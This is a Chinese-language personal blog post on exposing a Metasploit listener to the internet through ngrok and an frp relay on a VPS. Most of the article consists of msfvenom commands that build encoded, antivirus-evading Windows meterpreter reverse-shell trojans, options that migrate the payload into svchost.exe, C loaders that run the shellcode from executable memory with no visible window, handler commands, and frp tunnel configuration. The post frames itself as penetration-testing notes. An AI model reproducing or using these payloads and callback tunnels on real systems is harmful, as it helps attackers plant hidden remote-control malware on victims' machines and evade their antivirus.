<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><meta name="theme-color" content="#ffffff"><link rel="manifest" href="/manifest.json?v=2.1.1"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.1.1" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.1.1" type="image/png" sizes="32x32"><meta name="description" content="0x01、前言       在渗透测试的环节中，MSF可以说是老生常谈的必会工具之一，有的时候内网的MSF并不能满足我们的使用需求，此时我们需要借助一些方法来进行端口转发，这里简单的介绍下如何将内网中的MSF转发到公网。">
<meta property="og:type" content="article">
<meta property="og:title" content="MSF映射到公网的常见方法">
<meta property="og:url" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/index.html">
<meta property="og:site_name" content="CRLF&#39;s Blog">
<meta property="og:description" content="0x01、前言       在渗透测试的环节中，MSF可以说是老生常谈的必会工具之一，有的时候内网的MSF并不能满足我们的使用需求，此时我们需要借助一些方法来进行端口转发，这里简单的介绍下如何将内网中的MSF转发到公网。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/ngrok.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/ngrok-kali.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/ngrok1.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/www.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/tcp.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/shellcode.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/msf.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/frp.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/web.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/frp_c.png">
<meta property="og:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/xx.png">
<meta property="article:published_time" content="2020-10-18T13:32:59.000Z">
<meta property="article:modified_time" content="2020-10-23T01:59:16.984Z">
<meta property="article:author" content="crlf">
<meta property="article:tag" content="MSF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/ngrok.png"><title>MSF映射到公网的常见方法 | CRLF's Blog</title><link ref="canonical" href="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.1.1"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":4},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":true},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"carbon","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: {"avoidBanner":true},
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: {"switchPost":true},
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="CRLF's Blog" type="application/atom+xml">
</head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">分类</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/reading/"><span class="header-nav-menu-item__icon"><i class="fas fa-book"></i></span><span class="header-nav-menu-item__text">menu.reading</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">CRLF's Blog</div><div class="header-banner-info__subtitle">临渊羡鱼,不如退而结网,水至清则无鱼,人至察则无徒。</div></div><div class="header-banner-arrow"><div class="header-banner-arrow__icon"><i class="fas fa-angle-down"></i></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><div class="sticky-top" data-popover="置顶文章" data-popover-pos="up"><span class="sticky-top__icon"><i class="fas fa-thumbtack"></i></span></div><h1 class="post-title">MSF映射到公网的常见方法</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2020-10-18</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2020-10-23</span></span><span class="post-meta-item post-meta-item--visitors"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value" id="busuanzi_value_page_pv"></span></span></div></header><div class="post-body"><hr>

        <h3 id="0x01、前言">
          <a href="#0x01、前言" class="heading-link"><i class="fas fa-link"></i></a>0x01、前言</h3>
      <p>在渗透测试的环节中，MSF可以说是老生常谈的必会工具之一，有的时候内网的MSF并不能满足我们的使用需求，此时我们需要借助一些方法来进行端口转发，这里简单的介绍下如何将内网中的MSF转发到公网。</p>
<a id="more"></a>


        <h3 id="0x02、常见的两种转发方式">
          <a href="#0x02、常见的两种转发方式" class="heading-link"><i class="fas fa-link"></i></a>0x02、常见的两种转发方式</h3>
      
        <h4 id="方法①：使用Ngrok内网映射">
          <a href="#方法①：使用Ngrok内网映射" class="heading-link"><i class="fas fa-link"></i></a>方法①：使用Ngrok内网映射</h4>
      <p>首先我们需要有一个Ngrok官网的账户，官网地址：<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://ngrok.com/%EF%BC%8C%E6%B3%A8%E5%86%8C%E5%A5%BD%E5%90%8E%EF%BC%8C%E9%A6%96%E5%85%88%E4%B8%8B%E8%BD%BD%E4%B8%80%E4%B8%AANgrok%E8%BD%AF%E4%BB%B6%EF%BC%8C%E4%B8%8B%E8%BD%BD%E5%9C%B0%E5%9D%80%EF%BC%9Ahttps://ngrok.com/download">https://ngrok.com/，注册好后，首先下载一个Ngrok软件，下载地址：https://ngrok.com/download</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>   </p>
<p>下载完成后，将软件复制到kali，解压后执行下图中的命令（ngrok官网会分配你个key）</p>
<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/ngrok.png" alt="ngrok"></p>
<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/ngrok-kali.png" alt="ngrok-kali"></p>
<p>接下来就很简单了，如果想将本地的http服务转发到公网，那么可以执行下列命令，然后会将http服务转发到公网的ngrok域名上</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.&#x2F;ngrok http 80</span><br></pre></td></tr></table></div></figure>

<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/ngrok1.png" alt="ngrok1"></p>
<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/www.png" alt="www"></p>
<p>ok，试完了http，我们来将tcp转发</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.&#x2F;ngrok tcp 8888</span><br></pre></td></tr></table></div></figure>

<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/tcp.png" alt="tcp"></p>
<p> 接下来，我们使用msf生成一个木马测试下</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 --platform Windows -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;攻击机IP LPORT&#x3D;攻击机端口 -e x86&#x2F;shikata_ga_nai -b &#39;\x00\x0a\xff&#39; -i 15 -f exe -o payload.exe</span><br></pre></td></tr></table></div></figure>

<p>这里简单说下木马的参数：</p>
<ul>
<li><p>-p     选择指定payload</p>
</li>
<li><p>–e    选择制定编码器（不同编码器免杀效果也有不同，部分编码器应对火绒等杀软效果显著）</p>
</li>
<li><p>-i     编码次数</p>
</li>
<li><p>-b     去处多余/坏字符，lhost是你申请的ngrok服务器地址 lport是自定义的远程端口</p>
</li>
<li><p>-f      生成指定格式</p>
</li>
<li><p>-a     选择架构平台，包括x86 | x64 | x86_64</p>
</li>
<li><p>–platform          选择系统类型</p>
</li>
</ul>
<p>当然也可以生成c的shellcode</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 --platform Windows -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;攻击机IP LPORT&#x3D;攻击机端口 -e x86&#x2F;shikata_ga_nai -b &#39;\x00\x0a\xff&#39; -i 15 -f c </span><br></pre></td></tr></table></div></figure>

<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/shellcode.png" alt="shellcode"></p>
<p>使用VC++6.0对下面的代码进行编译</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line"></span><br><span class="line">#pragmacomment( linker, “&#x2F;subsystem:”windows” &#x2F;entry:”mainCRTStartup”&quot;)&#x2F;&#x2F;运行时不显示窗口</span><br><span class="line"></span><br><span class="line">unsignedchar buf[] &#x3D;</span><br><span class="line"></span><br><span class="line">“buf数组”;&#x2F;&#x2F;将复制的数组粘贴到此处</span><br><span class="line"></span><br><span class="line">main()</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">((void(*)(void))&amp;buf)();</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>



<p>回归正题，使用msf监听模块监听</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;multi&#x2F;handler</span><br><span class="line"></span><br><span class="line">set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</span><br><span class="line"></span><br><span class="line">set lhost 127.0.0.1</span><br><span class="line"></span><br><span class="line">set lport 8888</span><br><span class="line"></span><br><span class="line">exploit</span><br></pre></td></tr></table></div></figure>



<p>meterpreter获取会话</p>
<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/msf.png" alt="msf"></p>
<p>方法②：使用frp+vps内网映射</p>
<p>首先需要去gihub下载frp :<span class="exturl"><a class="exturl__link" target="_blank" rel="noopener" href="https://github.com/fatedier/frp/releases">https://github.com/fatedier/frp/releases</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span> 这里我下载的linux 64的版本（因为服务器是linux），下载后分别放到本地kali和服务器上，解压后，然后分别去配置：</p>
<p>服务端配置frps.ini文件：</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">bind_addr &#x3D; 0.0.0.0			 &#x2F;&#x2F;填0.0.0.0即可意为本机ip</span><br><span class="line">bind_port &#x3D; 6531			&#x2F;&#x2F;frp连接端口</span><br><span class="line">dashboard_addr &#x3D; 0.0.0.0     &#x2F;&#x2F;填0.0.0.0即可意为本机ip</span><br><span class="line">dashboard_port &#x3D; 7500		&#x2F;&#x2F;网页访问端口</span><br><span class="line">dashboard_user &#x3D; admin 		&#x2F;&#x2F;用户名</span><br><span class="line">dashboard_pwd &#x3D; crlf 		&#x2F;&#x2F;密码</span><br><span class="line">token &#x3D; crlf			   &#x2F;&#x2F;frp连接口令</span><br></pre></td></tr></table></div></figure>

<p>配置完成后，启动服务端</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">方法一：.&#x2F;frps - c frps.ini		&#x2F;&#x2F;前台启动，可以看到详细的监听xinxi</span><br><span class="line">方法二：nohup .&#x2F;frps -c frps.ini &gt; log.txt &amp;		&#x2F;&#x2F;后台启动</span><br></pre></td></tr></table></div></figure>

<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/frp.png" alt="frp"></p>
<p>启动成功后可以通过网页端访问来查看</p>
<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/web.png" alt="web"></p>
<p>接下来配置客户端kali的frpc.ini</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr &#x3D; 66.23.x.x      &#x2F;&#x2F;vps的ip</span><br><span class="line">server_port &#x3D; 6531     		&#x2F;&#x2F;连接frp的端口</span><br><span class="line">token &#x3D; crlf      			&#x2F;&#x2F;连接frp口令</span><br><span class="line">[msf]</span><br><span class="line">type &#x3D; tcp     			   &#x2F;&#x2F;tcp协议</span><br><span class="line">local_ip &#x3D; 127.0.0.1       &#x2F;&#x2F;填127.0.0.1即可</span><br><span class="line">local_port &#x3D; 6759         &#x2F;&#x2F;转发到vps的点端口</span><br><span class="line">remote_port &#x3D; 6000        &#x2F;&#x2F;访问端口</span><br></pre></td></tr></table></div></figure>



<p>运行 ./frpc  -c frpc.ini</p>
<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/frp_c.png" alt="frp_c"></p>
<p>ok，接下来使用上面的msfvenom 生成测试木马</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 --platform Windows -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;攻击机IP LPORT&#x3D;攻击机端口 -e x86&#x2F;shikata_ga_nai -b &#39;\x00\x0a\xff&#39; -i 15 -f exe -o payload.exe</span><br></pre></td></tr></table></div></figure>



<p>也可以使用shellcode</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp -a x86 --platform windows LHOST&#x3D;远程服务端ip </span><br><span class="line">LPORT&#x3D;远程服务端端口 -e x86&#x2F;shikata_ga_nai -i 15 -b &#39;x00&#39; PrependMigrate&#x3D;true PrependMigrateProc&#x3D;svchost.exe -f c &gt; shellcode.c</span><br></pre></td></tr></table></div></figure>

<ul>
<li><p>PrependMigrate=true、PrependMigrateProc=svchost.exe        使木马程序会迁移到svchost.exe进程</p>
</li>
<li><p>也可以使用windows/meterpreter/reverse_tcp_rc4这个payload，进行会话加密，增加免杀能力</p>
</li>
</ul>
<p>使用vc++6.0创建32位的项目并编译</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">#include&lt;windows.h&gt;</span><br><span class="line">#pragma comment(linker,&quot;&#x2F;subsystem:&quot;windows&quot; &#x2F;entry:&quot;mainCRTStartup&quot;&quot;) &#x2F;&#x2F;去除窗口</span><br><span class="line">unsigned char shellcode[]&#x3D;</span><br><span class="line">&quot;这里放生成的shellcode&quot;</span><br><span class="line">void main()</span><br><span class="line">&#123;</span><br><span class="line"> LPVOID Memory &#x3D; VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);</span><br><span class="line"> memcpy(Memory, shellcode, sizeof(shellcode));</span><br><span class="line"> ((void(*)())Memory)();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>



<p>最后启动msf，等待上线</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">use exploit&#x2F;multi&#x2F;handler</span><br><span class="line">set payload windows&#x2F;meterpreter&#x2F;reverse_tcp</span><br><span class="line">set lhost 127.0.0.1  </span><br><span class="line">set lport 6759     &#x2F;&#x2F; 本机转发端口</span><br></pre></td></tr></table></div></figure>

<p><img src="/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/xx.png" alt="xx"></p>

        <h3 id="0x03、结语：">
          <a href="#0x03、结语：" class="heading-link"><i class="fas fa-link"></i></a>0x03、结语：</h3>
      <p>写的很乱，用做笔记，希望能帮到有缘人吧，然后如有错误，欢迎斧正！</p>
<hr>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="http://crlf01.github.io">crlf</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/">http://crlf01.github.io/2020/10/18/MSF%E6%98%A0%E5%B0%84%E5%88%B0%E5%85%AC%E7%BD%91%E7%9A%84%E5%B8%B8%E8%A7%81%E6%96%B9%E6%B3%95/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="http://crlf01.github.io/tags/MSF/">MSF</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2020/10/22/MSF%E6%8F%90%E6%9D%83/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">MSF提权</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2020/10/10/Windows-Linux%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E5%89%8D%E5%A5%8F/"><span class="paginator-prev__text">Windows/Linux权限提升前奏</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01%E3%80%81%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">
          0x01、前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02%E3%80%81%E5%B8%B8%E8%A7%81%E7%9A%84%E4%B8%A4%E7%A7%8D%E8%BD%AC%E5%8F%91%E6%96%B9%E5%BC%8F"><span class="toc-number">2.</span> <span class="toc-text">
          0x02、常见的两种转发方式</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E2%91%A0%EF%BC%9A%E4%BD%BF%E7%94%A8Ngrok%E5%86%85%E7%BD%91%E6%98%A0%E5%B0%84"><span class="toc-number">2.1.</span> <span class="toc-text">
          方法①：使用Ngrok内网映射</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x03%E3%80%81%E7%BB%93%E8%AF%AD%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">
          0x03、结语：</span></a></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/stun-logo.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">人间值得 未来可期</p></div><div class="sidebar-ov-social"><a class="sidebar-ov-social-item" href="https://github.com/crlf01/" target="_blank" rel="noopener" data-popover="Github" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-github"></i></span></a><a class="sidebar-ov-social-item" href="https://weibo.com/" target="_blank" rel="noopener" data-popover="微博" data-popover-pos="up"><span class="sidebar-ov-social-item__icon"><i class="fab fa-weibo"></i></span></a><a class="sidebar-ov-social-item" href="https://www.zhihu.com/" target="_blank" rel="noopener" data-popover="知乎" data-popover-pos="up"><span class="sidebar-ov-social-item__icon">知</span></a></div><div class="sidebar-ov-feed"></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">7</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">4</div><div class="sidebar-ov-state-item__name">分类</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">4</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2020</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span><a href="https://github.com/crlf01" rel="noopener" target="_blank">crlf</a></span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v5.2.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.1.1</span></div><div class="busuanzi"><span class="busuanzi-siteuv"><span class="busuanzi-siteuv__icon"><i class="fas fa-user"></i></span><span class="busuanzi-siteuv__info">访问人数</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_uv"></span></span><span class="busuanzi-sitepv"><span class="busuanzi-siteuv__icon"><i class="fas fa-eye"></i></span><span class="busuanzi-siteuv__info">浏览总量</span><span class="busuanzi-siteuv__value" id="busuanzi_value_site_pv"></span></span></div><div>托管于 <a href="https://github.com/crlf01/crlf01.github.io/tree/hexo" rel="noopener" target="_blank">crlf</a></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="https://cdn.jsdelivr.net/npm/ribbon.js@latest/dist/ribbon.min.js" size="120" alpha="0.6" zIndex="-1"></script><script src="https://cdn.jsdelivr.net/npm/pjax@latest/pjax.min.js"></script><script>window.addEventListener('DOMContentLoaded', function () {
  var pjax = new Pjax({"selectors":["head title","#main",".pjax-reload"],"history":true,"scrollTo":false,"scrollRestoration":false,"cacheBust":false,"debug":false,"currentUrlFullReload":false,"timeout":0});
